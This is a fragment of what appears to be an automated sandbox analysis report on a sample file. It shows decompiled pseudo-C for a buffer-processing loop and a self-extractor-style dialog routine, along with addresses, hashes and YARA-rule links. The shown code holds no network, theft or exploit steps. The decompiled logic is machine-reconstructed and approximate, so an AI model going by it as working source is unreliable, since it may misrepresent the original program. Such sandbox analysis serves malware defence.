                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: df65fa386491ac57c92e0898e1d71baddbfa0233167dbfba189e55625a67caf2
                                                        • Instruction ID: a466ce08dfebda0dcbaddf99943ac0b9542f8699126aae5c647da3ec48c29d77
                                                        • Opcode Fuzzy Hash: df65fa386491ac57c92e0898e1d71baddbfa0233167dbfba189e55625a67caf2
                                                        • Instruction Fuzzy Hash:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A16887 Relevance: .3, Instructions: 325COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 99%
                                                        			E00A16887(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx; // executed
				E00A130C9(__ecx, __edx); // executed
				E00A148F2(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E00A1F750( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_t161 = E00A0CC70( *_t216,  *((intOrPtr*)(_t216 + 0x20)) + _t263, 0x00400000 - _t263 & 0xfffffff0);
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E00A0A9B0(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E00A13A02(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E00A10ACC( *((intOrPtr*)(_t216 + 0x14)), E00A172D0, _t232);
											} else {
												E00A16CBC(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E00A10D11( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E00A172FF(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E00A13476(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00A21B10(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E00A1F750(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00A21B10( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E00A14DF4(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E00A1F750(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}










































                                                        0x00a16891
                                                        0x00a16893
                                                        0x00a168a1
                                                        0x00a168a9
                                                        0x00a168ad
                                                        0x00a168af
                                                        0x00a168b1
                                                        0x00a168b1
                                                        0x00a168b4
                                                        0x00a168ba
                                                        0x00a168bb
                                                        0x00a168c0
                                                        0x00a168ca
                                                        0x00a168b1
                                                        0x00a168d9
                                                        0x00a168e9
                                                        0x00a168f2
                                                        0x00a168f9
                                                        0x00a168fc
                                                        0x00a168fe
                                                        0x00a16902
                                                        0x00a16904
                                                        0x00a16908
                                                        0x00a1690c
                                                        0x00a16910
                                                        0x00a16910
                                                        0x00a16923
                                                        0x00a16928
                                                        0x00a1692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16934
                                                        0x00a16936
                                                        0x00a1693a
                                                        0x00a16942
                                                        0x00000000
                                                        0x00a16948
                                                        0x00a1694e
                                                        0x00000000
                                                        0x00a16ba4
                                                        0x00a16958
                                                        0x00a1695a
                                                        0x00a1695e
                                                        0x00a16962
                                                        0x00a16962
                                                        0x00a16964
                                                        0x00a1696a
                                                        0x00a1696e
                                                        0x00a1696e
                                                        0x00a16970
                                                        0x00a16973
                                                        0x00a16975
                                                        0x00a16979
                                                        0x00a16980
                                                        0x00a16982
                                                        0x00a16995
                                                        0x00a1699a
                                                        0x00a169a2
                                                        0x00a169a5
                                                        0x00a169a5
                                                        0x00a169a9
                                                        0x00a169ac
                                                        0x00a169b2
                                                        0x00a169b8
                                                        0x00a169be
                                                        0x00a169c1
                                                        0x00a169c4
                                                        0x00000000
                                                        0x00a169c4
                                                        0x00a16984
                                                        0x00a16984
                                                        0x00a169c8
                                                        0x00a169c8
                                                        0x00a169cd
                                                        0x00a169d7
                                                        0x00a169dd
                                                        0x00a169e1
                                                        0x00a169e7
                                                        0x00a16a1a
                                                        0x00a16a1a
                                                        0x00a16a1f
                                                        0x00a16a30
                                                        0x00a16a30
                                                        0x00a16a37
                                                        0x00a16a21
                                                        0x00a16a21
                                                        0x00a16a28
                                                        0x00000000
                                                        0x00a16a2a
                                                        0x00a16a2a
                                                        0x00a16a2a
                                                        0x00a16a28
                                                        0x00a16a3f
                                                        0x00a16a4c
                                                        0x00a16a4e
                                                        0x00a16a51
                                                        0x00a16a55
                                                        0x00a16a55
                                                        0x00a16a57
                                                        0x00a16a5b
                                                        0x00a16a63
                                                        0x00a16a63
                                                        0x00a16a68
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16a5d
                                                        0x00a16a5d
                                                        0x00a16a61
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16a61
                                                        0x00a169e9
                                                        0x00a169ec
                                                        0x00a169f0
                                                        0x00a169f6
                                                        0x00a169f7
                                                        0x00a169fc
                                                        0x00a169fe
                                                        0x00a16a79
                                                        0x00a16a79
                                                        0x00a16a00
                                                        0x00a16a00
                                                        0x00a16a04
                                                        0x00a16a0f
                                                        0x00a16a0f
                                                        0x00a16a13
                                                        0x00000000
                                                        0x00a16a06
                                                        0x00a16a06
                                                        0x00a16a0d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16a0d
                                                        0x00a16a04
                                                        0x00a169fe
                                                        0x00a169e7
                                                        0x00000000
                                                        0x00a16a6a
                                                        0x00a16a6d
                                                        0x00a16a6f
                                                        0x00a16a6f
                                                        0x00a16a77
                                                        0x00a16a7e
                                                        0x00a16a7e
                                                        0x00a16a84
                                                        0x00a16a89
                                                        0x00a16a8b
                                                        0x00a16a8d
                                                        0x00a16a8f
                                                        0x00a16a8f
                                                        0x00a16a8f
                                                        0x00a16a90
                                                        0x00a16a92
                                                        0x00a16a94
                                                        0x00a16a96
                                                        0x00a16a98
                                                        0x00a16a9c
                                                        0x00a16a9c
                                                        0x00a16aa2
                                                        0x00a16aa6
                                                        0x00a16aaa
                                                        0x00a16aae
                                                        0x00a16ab0
                                                        0x00a16ab3
                                                        0x00a16ab5
                                                        0x00a16ab8
                                                        0x00a16aba
                                                        0x00a16abc
                                                        0x00a16abe
                                                        0x00a16abe
                                                        0x00a16ac0
                                                        0x00a16ac5
                                                        0x00a16ac8
                                                        0x00a16add
                                                        0x00a16aca
                                                        0x00a16acd
                                                        0x00a16acd
                                                        0x00a16ae6
                                                        0x00a16ae8
                                                        0x00a16aec
                                                        0x00a16af0
                                                        0x00a16af0
                                                        0x00a16af6
                                                        0x00a16af6
                                                        0x00a16afa
                                                        0x00a16afe
                                                        0x00a16b00
                                                        0x00a16c5b
                                                        0x00000000
                                                        0x00a16b06
                                                        0x00a16b09
                                                        0x00a16b10
                                                        0x00a16b14
                                                        0x00a16b16
                                                        0x00a16b82
                                                        0x00a16b82
                                                        0x00000000
                                                        0x00a16b18
                                                        0x00a16b18
                                                        0x00a16b18
                                                        0x00a16b1a
                                                        0x00a16b1d
                                                        0x00a16b1f
                                                        0x00a16b26
                                                        0x00a16b41
                                                        0x00a16b44
                                                        0x00a16b49
                                                        0x00a16b4b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16b28
                                                        0x00a16b2b
                                                        0x00a16b30
                                                        0x00a16b32
                                                        0x00a16b38
                                                        0x00a16b3f
                                                        0x00a16b51
                                                        0x00a16b51
                                                        0x00a16b58
                                                        0x00a16b5e
                                                        0x00a16b65
                                                        0x00a16bbc
                                                        0x00a16bc1
                                                        0x00a16bc4
                                                        0x00a16bc6
                                                        0x00a16bcc
                                                        0x00a16bd3
                                                        0x00a16bd7
                                                        0x00a16bdf
                                                        0x00a16be5
                                                        0x00a16be8
                                                        0x00a16bec
                                                        0x00a16bf3
                                                        0x00a16bf7
                                                        0x00a16bfe
                                                        0x00a16c00
                                                        0x00a16c02
                                                        0x00a16c18
                                                        0x00a16c20
                                                        0x00a16c29
                                                        0x00a16c2d
                                                        0x00a16c33
                                                        0x00000000
                                                        0x00a16c33
                                                        0x00000000
                                                        0x00a16c00
                                                        0x00a16b67
                                                        0x00a16b67
                                                        0x00a16b6b
                                                        0x00a16bb1
                                                        0x00a16bb3
                                                        0x00a16b86
                                                        0x00a16b86
                                                        0x00a16b88
                                                        0x00a16b8e
                                                        0x00a16b92
                                                        0x00a16b94
                                                        0x00a16b9a
                                                        0x00a16c45
                                                        0x00a16c47
                                                        0x00a16c49
                                                        0x00a16c3d
                                                        0x00a16c3d
                                                        0x00a16c3f
                                                        0x00a16c5f
                                                        0x00a16c5f
                                                        0x00a16c64
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16c4b
                                                        0x00a16c54
                                                        0x00a16c3a
                                                        0x00a16c3a
                                                        0x00000000
                                                        0x00a16c3a
                                                        0x00a16c49
                                                        0x00a16ba0
                                                        0x00a16ba0
                                                        0x00000000
                                                        0x00a16ba0
                                                        0x00a16b9a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16b6b
                                                        0x00a16b65
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a16b3f
                                                        0x00a16b32
                                                        0x00000000
                                                        0x00a16b6d
                                                        0x00a16b71
                                                        0x00a16b77
                                                        0x00a16b78
                                                        0x00a16b7c
                                                        0x00a16b7c
                                                        0x00000000
                                                        0x00a16b1a
                                                        0x00a16b16
                                                        0x00000000
                                                        0x00a16b00
                                                        0x00a16bac
                                                        0x00000000
                                                        0x00a1694e
                                                        0x00a16942
                                                        0x00000000
                                                        0x00a1693a
                                                        0x00a16c6a
                                                        0x00a16c72
                                                        0x00a16c75
                                                        0x00a16c7a
                                                        0x00a16c88
                                                        0x00a16c8d
                                                        0x00a16c9b
                                                        0x00a16cb9

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 9536a62bc03f2e061565c43edea60154e29423d5a7e86d541fd2830402d7dea4
                                                        • Instruction ID: 5aabf4966597c5b775e8a00b9918185efc1217457286718cb9600d736c7877bb
                                                        • Opcode Fuzzy Hash: 9536a62bc03f2e061565c43edea60154e29423d5a7e86d541fd2830402d7dea4
                                                        • Instruction Fuzzy Hash: 21D1D371A083458FDB14CF28C9817DABBE0AF95348F08456DE885DB242D734E999CBDA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1B170 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 725COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E00A1B170(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				void* _t166;
				int _t169;
				void* _t182;
				void* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				int _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t256;
				WCHAR* _t257;
				int _t261;
				int _t263;
				void* _t268;
				void* _t272;
				signed short _t277;
				int _t279;
				WCHAR* _t288;
				WCHAR* _t290;
				intOrPtr _t292;
				void* _t301;
				int _t302;
				struct HWND__* _t304;
				intOrPtr _t307;
				void* _t308;
				struct HWND__* _t309;
				void* _t311;
				struct HWND__* _t313;
				long _t314;
				struct HWND__* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;

				_t301 = __edx;
				_t287 = __ecx;
				E00A1E554(E00A3230E, _t320);
				E00A1E630();
				_t277 =  *(_t320 + 0x10);
				_t307 =  *((intOrPtr*)(_t320 + 0xc));
				_t304 =  *(_t320 + 8);
				if(E00A0130B(_t301, _t304, _t307, _t277,  *((intOrPtr*)(_t320 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t308 = _t307 - 0x110;
					__eflags = _t308;
					if(__eflags == 0) {
						_push(_t304);
						E00A1CFEE(_t287, _t301, __eflags, __fp0);
						_t105 =  *0xa4c574;
						_t279 = 1;
						 *0xa4844c = _t304;
						 *0xa48458 = _t304;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t304, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xa56b7c;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t304, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t304, 0x68);
						 *(_t320 - 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00A1A004(_t320 - 0x1174, 0x800);
						_t111 = GetDlgItem(_t304, 0x66);
						__eflags =  *0xa4a472;
						_t309 = _t111;
						 *(_t320 - 0x18) = _t309;
						_t288 = 0xa4a472;
						if( *0xa4a472 == 0) {
							_t288 = _t320 - 0x1174;
						}
						SetWindowTextW(_t309, _t288);
						E00A1A558(_t309); // executed
						_push(0xa4843c);
						_push(0xa48438);
						_push(0xa5dc90);
						_push(_t304);
						 *0xa48463 = 0; // executed
						_t114 = E00A1AA53(_t288, _t301, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xa48452 = _t279;
						}
						__eflags =  *0xa4843c;
						if( *0xa4843c > 0) {
							_push(7);
							_push( *0xa48438);
							_push(_t304);
							E00A1C085();
						}
						__eflags =  *0xa5ec98;
						if( *0xa5ec98 == 0) {
							SetDlgItemTextW(_t304, 0x6b, E00A0E0AC(_t288, 0xbf));
							SetDlgItemTextW(_t304, _t279, E00A0E0AC(_t288, 0xbe));
						}
						__eflags =  *0xa4843c;
						if( *0xa4843c <= 0) {
							L103:
							__eflags =  *0xa48463;
							if( *0xa48463 != 0) {
								L114:
								__eflags =  *0xa4a46c - 2;
								if( *0xa4a46c == 2) {
									EnableWindow(_t309, 0);
								}
								__eflags =  *0xa49468;
								if( *0xa49468 != 0) {
									E00A012C8(_t304, 0x67, 0);
									E00A012C8(_t304, 0x66, 0);
								}
								_t115 =  *0xa4a46c;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xa48450;
									if( *0xa48450 == 0) {
										_push(0);
										_push(_t279);
										_push(0x111);
										_push(_t304);
										__eflags = _t115 - _t279;
										if(_t115 != _t279) {
											 *0xa620a8();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xa48452;
								if( *0xa48452 != 0) {
									SetDlgItemTextW(_t304, _t279, E00A0E0AC(_t288, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xa5dc84;
							if( *0xa5dc84 != 0) {
								goto L114;
							}
							__eflags =  *0xa4a46c;
							if( *0xa4a46c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t311 = 0xaa;
							 *((short*)(_t320 - 0x969c)) = 0;
							do {
								__eflags = _t311 - 0xaa;
								if(_t311 != 0xaa) {
									L109:
									__eflags = _t311 - 0xab;
									if(__eflags != 0) {
										L111:
										E00A10109(__eflags, _t320 - 0x969c, " ", 0x2000);
										E00A10109(__eflags, _t320 - 0x969c, E00A0E0AC(_t288, _t311), 0x2000);
										goto L112;
									}
									__eflags =  *0xa5ec98;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xa5ec98;
								if( *0xa5ec98 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t311 = _t311 + 1;
								__eflags = _t311 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0xa48440; // 0x0
							E00A19878(_t288, __eflags,  *0xa40ed4,  *(_t320 - 0x14), _t320 - 0x969c, 0, 0);
							_t309 =  *(_t320 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0xa48438);
							_push(_t304); // executed
							E00A1C085(); // executed
							_t133 =  *0xa5dc84;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xa4a46c;
								if(__eflags == 0) {
									_t290 =  *0xa48440; // 0x0
									E00A19878(_t290, __eflags,  *0xa40ed4,  *(_t320 - 0x14), _t133, 0, 0);
									L00A2389E( *0xa5dc84);
									_pop(_t288);
								}
							}
							__eflags =  *0xa4a46c - _t279;
							if( *0xa4a46c == _t279) {
								L102:
								_push(_t279);
								_push( *0xa48438);
								_push(_t304);
								E00A1C085();
								goto L103;
							} else {
								 *0xa620c8(_t304);
								__eflags =  *0xa4a46c - _t279;
								if( *0xa4a46c == _t279) {
									goto L102;
								}
								__eflags =  *0xa4a471;
								if( *0xa4a471 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xa48438);
								_push(_t304);
								E00A1C085();
								__eflags =  *0xa5ec90;
								if( *0xa5ec90 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xa40ed4, L"LICENSEDLG", 0, E00A1AF60, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xa48450 = _t279;
									L26:
									_push(_t279);
									L13:
									EndDialog(_t304, ??); // executed
									L125:
									_t116 = _t279;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t308 != 1;
					if(_t308 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t277 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xa48451;
						if( *0xa48451 != 0) {
							L23:
							GetDlgItemTextW(_t304, 0x66, _t320 - 0x2174, 0x800);
							__eflags =  *0xa48451;
							if( *0xa48451 == 0) {
								__eflags =  *0xa48452;
								if( *0xa48452 == 0) {
									_t313 = GetDlgItem(_t304, 0x68);
									__eflags =  *0xa4845c; // 0x0
									if(__eflags == 0) {
										SendMessageW(_t313, 0xb1, 0, 0xffffffff);
										SendMessageW(_t313, 0xc2, 0, 0xa335b4);
									}
									SetFocus(_t313);
									__eflags =  *0xa49468;
									if( *0xa49468 == 0) {
										_t314 = 0x800;
										E00A10131(_t320 - 0x1174, _t320 - 0x2174, 0x800);
